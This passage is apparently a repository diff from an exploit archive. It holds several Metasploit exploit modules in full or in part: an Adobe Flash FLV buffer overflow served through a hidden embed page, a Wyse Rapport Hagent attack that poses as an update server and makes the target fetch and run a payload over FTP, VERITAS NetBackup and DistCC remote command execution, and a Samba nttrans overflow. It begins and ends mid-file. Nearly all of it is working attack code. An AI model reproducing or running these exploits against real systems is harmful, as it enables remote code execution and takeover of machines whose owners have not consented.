os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
@flv = create_flv
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
if request.uri =~ /\.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset
data = ''
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "\xee" * 0x440 # SoundData
tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "\x00\x04\x41" # DataSize
tag1 << "\x00\x00\x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "\x00\x00\x00" # StreamID, always 0
tag1 << data
body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize
flv = ''
flv << header
flv << body
flv
end
end

251
platforms/multiple/remote/16287.rb
View file

@ -1,251 +0,0 @@
##
# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'timeout'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'kf',
'Version' => '$Revision: 10998 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => '',
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2009'
))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
end
def exploit
if(datastore['SRVPORT'].to_i != 21)
print_error("This exploit requires the FTP service to run on port 21")
return
end
# Connect to the target service
print_status("Connecting to the target")
connect()
# Start the FTP service
print_status("Starting the FTP server")
start_service()
# Create the executable with our payload
print_status("Generating the EXE")
@exe_file = generate_payload_exe
if target['Platform'] == 'win'
maldir = "C:\\" # Windows
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
co = "XP"
elsif target['Platform'] == 'linux'
maldir = "//tmp//" # Linux
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
co = "LXS"
end
@exe_sent = false
# Start the HTTP service
print_status("Starting the HTTP service")
wdmserver = Rex::Socket::TcpServer.create({
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
})
# Let this close automatically
add_socket(wdmserver)
wdmserver_port = wdmserver.getsockname[2]
print_status("Starting the HTTP service on port #{wdmserver_port}")
fakerapport = Rex::Socket.source_address(rhost)
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
# FTP Credentials
ftpserver = Rex::Socket.source_address(rhost)
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftpport = 21
ftpsecure = '0'
incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
if target['Platform'] == 'win'
pwn = pwn1 + pwn3
elsif target['Platform'] == 'linux'
pwn = pwn1 + pwn2 + pwn3
end
# Send the malicious request
sock.put(mal)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")
if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end
print_status("Waiting on a connection to the HTTP service")
begin
Timeout.timeout(190) do
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")
case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
res = pwn
when /V02/
print_status("++ device sending V02 query...")
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
done = true
when /V55/
print_status("++ device sending V55 query...")
res = pwn
when /POST/ # PUT is used for non encrypted requests.
print_status("++ device sending V55 query...")
res = pwn
done = true
else
print_status("+++ sending generic response...")
res = pwn
end
print_status("Sending reply: #{res}")
session.put(res)
session.close
end
end
rescue ::Timeout::Error
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
return
end
print_status("Waiting on the FTP request...")
stime = Time.now.to_f
while(not @exe_sent)
break if (stime + 90 < Time.now.to_f)
select(nil, nil, nil, 0.25)
end
if(not @exe_sent)
print_status("No executable sent :(")
end
stop_service()
wdmserver.close()
handler
disconnect
end
def on_client_command_retr(c,arg)
print_status("#{@state[c][:name]} FTP download request for #{arg}")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
conn.put(@exe_file)
c.put("226 Transfer complete.\r\n")
conn.close
@exe_sent = true
end
def on_client_command_size(c,arg)
print_status("#{@state[c][:name]} FTP size request for #{arg}")
c.put("213 #{@exe_file.length}\r\n")
end
end

97
platforms/multiple/remote/16290.rb
View file

@ -1,97 +0,0 @@
##
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'VERITAS NetBackup Remote Command Execution',
'Description' => %q{
This module allows arbitrary command execution on an
ephemeral port opened by Veritas NetBackup, whilst an
administrator is authenticated. The port is opened and
allows direct console access as root or SYSTEM from
any source address.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10617 $',
'References' =>
[
[ 'CVE', '2004-1389' ],
[ 'OSVDB', '11026' ],
[ 'BID', '11494' ],
[ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ],
],
'Privileged' => true,
'Platform' => ['unix', 'win', 'linux'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', { }],
],
'DisclosureDate' => 'Oct 21 2004',
'DefaultTarget' => 0))
end
def check
connect
sploit = rand_text_alphanumeric(10)
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"
sock.put(buf)
banner = sock.get(3,3)
disconnect
if (banner and banner =~ /#{sploit}/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = payload.encoded.split(" ")
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
buf << payload.encoded
buf << "\n"
sock.put(buf)
res = sock.get(-1,3)
print_status("#{res}")
handler
disconnect
end
end

4
platforms/multiple/remote/37536.rb
View file

@ -5,7 +5,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
@ -17,13 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.

153
platforms/multiple/remote/41693.rb
View file

@ -1,153 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
'Description' => %q{
This module attempts to exploit a buffer overflow vulnerability present in
versions 2.2.2 through 2.2.6 of Samba.
The Samba developers report this as:
"Bug in the length checking for encrypted password change requests from clients."
The bug was discovered and reported by the Debian Samba Maintainers.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2002-1318' ],
[ 'OSVDB', '14525' ],
[ 'BID', '6210' ],
[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets' =>
[
[ "Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
# 0x081fc968
pattern = Rex::Text.pattern_create(12000)
pattern[532, 4] = [0x81b847c].pack('V')
pattern[836, payload.encoded.length] = payload.encoded
# 0x081b8138
connect
smb_login
targ_address = 0xfffbb7d0
#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#
subcommand = 1
param = ''
body = ''
setup_count = 0
setup_data = ''
data = param + body
pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
#
# Send a NTTrans secondary request with the magic displacement
#
param = pattern
body = ''
data = param + body
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
handler
end
end

53
platforms/multiple/remote/9915.rb
View file

@ -1,9 +1,9 @@
##
# $Id$
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,20 +14,21 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'DistCC Daemon Command Execution',
'Description' => %q{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2004-2687'],
@ -36,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
@ -48,16 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' =>
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 01 2002'
))
register_options(
[
Opt::RPORT(3632)
], self.class)
], self.class)
end
def exploit
@ -65,23 +68,24 @@ class Metasploit3 < Msf::Exploit::Remote
distcmd = dist_cmd("sh", "-c", payload.encoded);
sock.put(distcmd)
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
res = sock.get_once(24, 5)
if !(res and res.length == 24)
print_status("The remote distccd did not reply to our request")
disconnect
return
end
# Check STDERR
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
return if not len
if (len > 0)
res = sock.get_once(len, 5)
res.split("\n").each do |line|
@ -93,34 +97,35 @@ class Metasploit3 < Msf::Exploit::Remote
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
return if not len
if (len > 0)
res = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stdout: #{line}")
end
end
handler
disconnect
end
# Generate a distccd command
def dist_cmd(*args)
# Convince distccd that this is a compile
args.concat(%w{# -c main.c -o main.o})
# Set distcc 'magic fairy dust' and argument count
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
# Set the command arguments
args.each do |arg|
res << sprintf("ARGV%.8x%s", arg.length, arg)
end
return res
end
end
end

199
platforms/multiple/remote/9934.rb
View file

@ -1,35 +1,38 @@
##
# $Id: hagent_untrusted_hsdata.rb
# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
# http://metasploit.com/framework/
##
require 'timeout'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'kf',
'Version' => '$Revision$',
'References' =>
'Version' => '$Revision: 10998 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
@ -39,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
@ -48,46 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'Privileged' => true
'DisclosureDate' => 'Jul 10 2009'
))
register_options([
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
end
def exploit
if(datastore['SRVPORT'].to_i != 21)
print_error("This exploit requires the FTP service to run on port 21")
return
end
# Connect to the target service
print_status("Connecting to the target")
connect()
# Start the FTP service
print_status("Starting the FTP server")
start_service()
# Create the executable with our payload
print_status("Generating the EXE")
@exe_file = generate_payload_exe
if target['Platform'] == 'win'
@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
maldir = "C:\\" # Windows
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
co = "XP"
elsif target['Platform'] == 'linux'
@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
maldir = "//tmp//" # Linux
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
co = "LXS"
@ -102,113 +106,122 @@ class Metasploit3 < Msf::Exploit::Remote
'MsfExploit' => self
}
})
# Let this close automatically
add_socket(wdmserver)
wdmserver_port = wdmserver.getsockname[2]
print_status("Starting the HTTP service on port #{wdmserver_port}")
fakerapport = Rex::Socket.source_address(rhost)
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
# FTP Credentials
# FTP Credentials
ftpserver = Rex::Socket.source_address(rhost)
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftpport = 21
ftpsecure = '0'
incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
pwn2 =
"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
if target['Platform'] == 'win'
pwn = pwn1 + pwn3
pwn = pwn1 + pwn3
elsif target['Platform'] == 'linux'
pwn = pwn1 + pwn2 + pwn3
pwn = pwn1 + pwn2 + pwn3
end
# Send the malicious request
sock.put(mal)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: " + resp)
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")
if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end
print_status("Waiting on a connection to the HTTP service")
begin
Timeout.timeout(190) do
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")
case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
res = pwn
when /V02/
print_status("++ device sending V02 query...")
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
done = true
when /V55/
print_status("++ device sending V55 query...")
res = pwn
when /POST/ # PUT is used for non encrypted requests.
print_status("++ device sending V55 query...")
res = pwn
done = true
else
print_status("+++ sending generic response...")
res = pwn
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")
case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
res = pwn
when /V02/
print_status("++ device sending V02 query...")
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
done = true
when /V55/
print_status("++ device sending V55 query...")
res = pwn
when /POST/ # PUT is used for non encrypted requests.
print_status("++ device sending V55 query...")
res = pwn
done = true
else
print_status("+++ sending generic response...")
res = pwn
end
print_status("Sending reply: #{res}")
session.put(res)
session.close
end
print_status("Sending reply: #{res}")
session.put(res)
session.close
end
end
rescue ::TimeoutError
rescue ::Timeout::Error
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
return
end
print_status("Waiting on the FTP request...")
stime = Time.now.to_f
while(not @exe_sent)
break if (stime + 90 < Time.now.to_f)
select(nil, nil, nil, 0.25)
select(nil, nil, nil, 0.25)
end
if(not @exe_sent)
print_status("No executable sent :(")
end
stop_service()
wdmserver.close()
handler
disconnect
end
@ -220,14 +233,14 @@ class Metasploit3 < Msf::Exploit::Remote
c.put("425 Can't build data connection\r\n")
return
end
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
conn.put(@exe_file)
c.put("226 Transfer complete.\r\n")
conn.close
@exe_sent = true
end
def on_client_command_size(c,arg)
print_status("#{@state[c][:name]} FTP size request for #{arg}")
c.put("213 #{@exe_file.length}\r\n")

17
platforms/multiple/remote/9941.rb
View file

@ -1,9 +1,9 @@
##
# $Id$
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,14 +12,15 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'VERITAS NetBackup Remote Command Execution',
'Description' => %q{
This module allows arbitrary command execution on an
This module allows arbitrary command execution on an
ephemeral port opened by Veritas NetBackup, whilst an
